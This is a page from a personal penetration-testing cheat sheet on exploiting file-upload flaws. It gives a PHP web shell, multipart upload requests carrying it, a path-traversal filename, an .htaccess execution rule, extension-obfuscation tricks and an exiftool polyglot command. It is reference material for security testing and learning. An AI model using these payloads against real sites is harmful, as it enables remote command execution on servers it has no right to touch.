d4Rk's 1337 h4x0r guide
  • Introduction
  • Reconnaissance
    • Recon
    • OSINT
  • Enumeration
    • Network discovery
    • Port scanning
    • Webserver scanning
    • Exploit detection
    • Fuzzing
    • Process monitoring
  • Exploitation
    • Shells
      • Shells
      • TTY
    • Passwords
      • Hashcat
      • John the Ripper (JTR)
      • Hydra
      • Passwords & credentials
    • Web
      • SQL injection (SQLi)
      • Cross site scripting (XSS)
      • File inclusions (LFI, RFI)
      • Directory traversal
      • Cross site request forgery (CSRF)
      • XML external entity (XXE)
      • Cross origin resource sharing (CORS)
      • Server-side request forgery (SSRF)
      • Server-side template injection (SSTI)
      • Access control vulnerabilities
      • Authentication vulnerabilities
      • JWT attacks
      • File uploads
      • Host header attacks
      • Clickjacking
      • Logic flaws
      • OS command injection
      • HTTP Request smuggling
      • Insecure deserialization
      • DOM-based
      • WebSockets
      • Web cache poisoning
    • Buffer overflow
      • General
      • Linux
      • Windows
    • Misc
      • Evasion
      • SQSH
  • Privilege escalation
    • Linux
      • Overview
    • Windows
      • Overview
      • Mimikatz
      • PowerSploit
      • Juicy Potato, Rotten Potato (NG)
      • JAWS
      • Empire
      • SILENTTRINITY
  • Post exploitation
    • Loot
    • Pivoting
    • Standalone Tools
  • Services
    • TCP
      • TCP 21: FTP
      • TCP 22: SSH
      • TCP 23: Telnet
      • TCP 25, 587: SMTP
      • TCP 53: DNS
      • TCP 80, 443: HTTP(S)
      • TCP 88: Kerberos
      • TCP 110, 995: POP3(S)
      • TCP 111: rpcbind
      • TCP 135: MSRPC
      • TCP 139, 445: NetBIOS, SMB
      • TCP 143, 993: IMAP(S)
      • TCP 389, 636, 3268, 3269: LDAP
      • TCP 1433, UDP 1434: MSSQL Server
      • TCP 2049: NFS
      • TCP 3306: MySQL
      • TCP 3389: RDP
      • TCP 5985: WinRM
      • TCP 6379: Redis
      • TCP 27017: MongoDB
    • UDP
      • UDP 137, 138, TCP 139: NetBIOS
      • UDP 161: SNMP
    • Misc
      • Active Directoy
      • Apache Tomcat
      • Drupal
      • H2 Databases
      • IIS
      • IPsec
      • IRC
      • Java Applets
      • Java RMI
      • Jenkins
      • Joomla
      • Oracle
      • PHP
      • SharePoint
      • WordPress
  • File transfer
    • Overview
    • Wget
    • Pure-FTPd
    • TFTP
    • VBScript: Wget clone
  • Misc
    • Bash
    • Burp Suite
    • Crypto
    • Ebowla
    • Firefox extensions
    • Impacket
    • Memory forensics
    • Metasploit Framework (MSF)
    • MITM
    • Msfvenom
    • Pass the Hash (PTH)
    • PowerShell
    • PowerShell on Linux
    • Wireshark
    • Wordlists and dictionaries
  • Bug Bounty
    • Platforms
    • Tools
Powered by GitBook
On this page
  • Unrestricted
  • Bypass file type validation
  • Upload file to another directory (path traversal)
  • Bypass file type filtering
  • Obfuscating file extensions
  • Polyglot (php/jpg)
Edit on GitHub
  1. Exploitation
  2. Web

File uploads

PreviousJWT attacksNextHost header attacks

Last updated 3 years ago

  • Heavily inspired by

Unrestricted

If there is no validation in place at all, one can just upload a malicious file.

<?php echo system($_GET['cmd']); ?>
cmd
description

exec

Execute an external program

passthru

Execute an external program and display raw output

shell_exec

Execute command via shell and return the complete output as a string

system

Execute an external program and display the output

Bypass file type validation

If there is no proper file type validation in place, it may be possible to send a valid Content-Type together with the malicious file.

POST /path HTTP/1.1
Host: website.com
Content-Length: 1337
Content-Type: multipart/form-data; boundary=---------------------------41688721411166396114242705702

---------------------------41688721411166396114242705702
Content-Disposition: form-data; name="image"; filename="cmd.php"
Content-Type: image/jpeg

<?php echo system($_GET['cmd']); ?>
---------------------------41688721411166396114242705702--

Upload file to another directory (path traversal)

If the malicous file can be uploaded but is not executed by the webserver, it may be possible to upload it to another directory, from which execution is possible.

POST /path HTTP/1.1
Host: website.com
Content-Length: 1337
Content-Type: multipart/form-data; boundary=---------------------------41688721411166396114242705702

---------------------------41688721411166396114242705702
Content-Disposition: form-data; name="image"; filename="..%2fcmd.php"
Content-Type: image/jpeg

<?php echo system($_GET['cmd']); ?>
---------------------------41688721411166396114242705702--

Bypass file type filtering

Sometimes insufficient blacklist filtering is in place, which may be bypassed. Instead of .php use extensions like .php5 or .shtml etc.

If possible, also try to enable execution by placing an .htaccess file in the directory.

AddType application/x-httpd-php .php5

Obfuscating file extensions

Depending on the validation mechanisms in place, some of the following may bypass them.

  • Case sensitive, e.g. cmd.pHp

  • Multiple extensions, e.g. cmd.php.jpg

  • URL encoding, e.g. cmd%2ephp

  • Null byte, e.g. cmd.php%00.jpg

  • Semicolons, e.g. cmd.php;.jpg

  • Multibyte encoding

  • Non recursive filters, e.g. cmd.p.phphp

Polyglot (php/jpg)

E.g. using exiftool to add php code in the comment field of a jpg.

exiftool -Comment="<?php echo system($_GET['cmd']); ?>" image.jpg -o polyglot.php
PortSwigger - Web Security Academy